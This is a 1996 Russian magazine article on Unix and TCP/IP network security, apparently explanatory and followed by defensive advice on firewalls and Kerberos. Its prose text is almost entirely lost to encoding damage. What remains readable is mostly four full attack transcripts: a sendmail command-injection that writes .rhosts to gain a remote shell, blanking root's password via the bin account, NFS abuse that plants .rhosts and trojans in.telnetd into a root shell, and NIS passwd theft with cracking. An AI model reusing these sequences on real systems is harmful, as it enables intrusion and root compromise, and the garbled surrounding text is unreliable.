:


    
http://www.osp.ru/os/os_1_96/source/crack.htm

· # 4(18)/96 · . 28-30

. ,

" ", lsu@kiae.su
---------------------------------------------------------------
Unix
IP-

TCP/IP Internet. , . , , . Internet . , , . CERT.

, , Internet, . "", . , Unix, .

. IP sendmail, . , Unix-. , . passwd , rlogin, rsh shell ( 1).

1

crack% telnet target.remote.com 25 
Connecting to 123.456.654.321. 
!    25 -  SMTP 
220 sendmail SMI/4.3.5.2 ready 
! ,   ,  . 
helo xxx 
220 Helo xxx, ( crack.edu ) 
mail from: "|echo crack.edu>/.rhosts"@target.remote.com 
!     . 
200 Sender ok. 
rcpt to: nosuchuser 
!     
500 nosuchuser: user unknown 
!   ,  . 
data 
230 Enter mail, end with "." 
200 Mail accepted 
! ,  .... 
quit 
crack% su 
!    ,       who 
# rsh target.remote.com /bin/csh -i 
Welcome to remote.com! 
Warning! No access to terminal, job control disabled! 
target# 

Unix . , : Sun, SunOS 4, NIS , , ( 2).

2

crack# su - bin 
$ rsh target.remote.com /bin/csh -i 
!   /etc/hosts.equiv   "+"  ... 
Welcome to remote.com! 
!  /etc   bin... 
Warning! No access to terminal, job control disabled! 
% ls -ldg /etc 
drwxr-xr-x 10 bin bin 1536 Apr 10 01:45 /etc/ 
% cd /etc 
!  passwd    ... 
% mv passwd passwd.was 
% cp passwd.was passwd 
!  
% ed passwd 
2341 
1p 
root:Nkkh&5gkljGyj:0:0:Root:/:/bin/csh 
s/Nkkh&5gkljGyj//p 
root::0:0:Root:/:/bin/csh 
w 
2341 
q 
!   . 
%echo /bin/csh -i | su root 
Warning! No access to terminal, job control disabled! 
target# mv /etc/passwd.was /etc/passwd 
!    ,   . 

TCP/IP , Network File System (NFS).

/etc/exports (SunOS 4.1) ( 3).

3

crack% showmount -e target.remote.com 
Export list for target.remote.com 
/home Everyone 
/disk3 neptun pluton alpha 
!     NFS 
crack% su 
# mount -t nfs target.remote.com:/home /mnt 
# cd /mnt 
!     
# ls -ldg * 
drwxr-xr-x 10 257 20 1536 Apr 10 01:45 user/ 
# echo crack.edu > user/.rhosts 
!  .rhosts   
# cat >> /etc/passwd 
user::257:20::/: 
^D 
!      
# su - user 
!   
$ rsh target.remote.com /bin/csh -i 
Warning! No access to terminal, job control disabled! 
!      
% id 
uid=257(user) gid=20(stuff) groups=20(stuff), 7(sys) 
% ls -ldg /usr/etc 
!     
drwxrwxr-x 10 bin bin 1536 Apr 10 01:45 /usr/etc 
% grep telnet /etc/inetd.conf 
telnet stream nowait root /usr/etc/in.telnetd in.telnetd 
!  ,   
! root"    
% cd /usr/etc 
% mv in.telnetd in.telnetd1 
!    
% cat > in.telnetd 
#!/bin/sh 
exec /bin/csh -i 
^D 
% chmod 755 in.telnetd 
!    
% telnet 127.1 
Connecting 127.1. 
Warning! No access to terminal, job control disabled! 
# chown user /etc; 
!  /etc  
^M: command not found 
# exit; 
^M: command not found 
Connection closed by foreign host. 
% cd /etc 
!        1. 
....... 

NIS- , "" passwd, . , , crack . ( 4) ( , ).

4

!   NIS  
crack% rpcinfo -p target.remote.com | grep bind 
120000 2 udp 2493 ypbind 
!  ... 
crack% ypx -o target.passwd -g target.remote.com 
!    
crack% crack target.passwd 
!     
[ a lot of time ] 
OK, user "user" has password "iamuser" 
! ,  
crack% telnet target.remote.com 
!     . 
..... 

, , . , . (cisco, wellfleet...) Unix- (Sun, DEC, BSDI, FreeBSD). . , / . rlogin, rsh, RPC (. ), , 2048 2049, - NFS. , , 25 . , - , TCP- . ( . firewall - ). " " (software firewall). , IP-, . , , (telnet, ftp...), , , . . , , ftp arch.kiae.su, :

:

telnet, rlogin, X11 ..

"" . , "" . ? , - , , Ethernet. , , . , , , NFS. , , , . , .

80- Kerberos. . , "" , . , , . . , , , - . , , . , , , , , . . . , . . -, . , , , telnet , , , . , Kerberos 4 . , Kerberos, , , . Kerberos 4 , , Kerberos ( , ..). , , 5, . Sphinx DEC NIS+ Sun. , (RPC UDP) .

, , , . "" . - , . He " ", - "" , .


Last-modified: Mon, 05 May 1997 07:36:09 GMT
: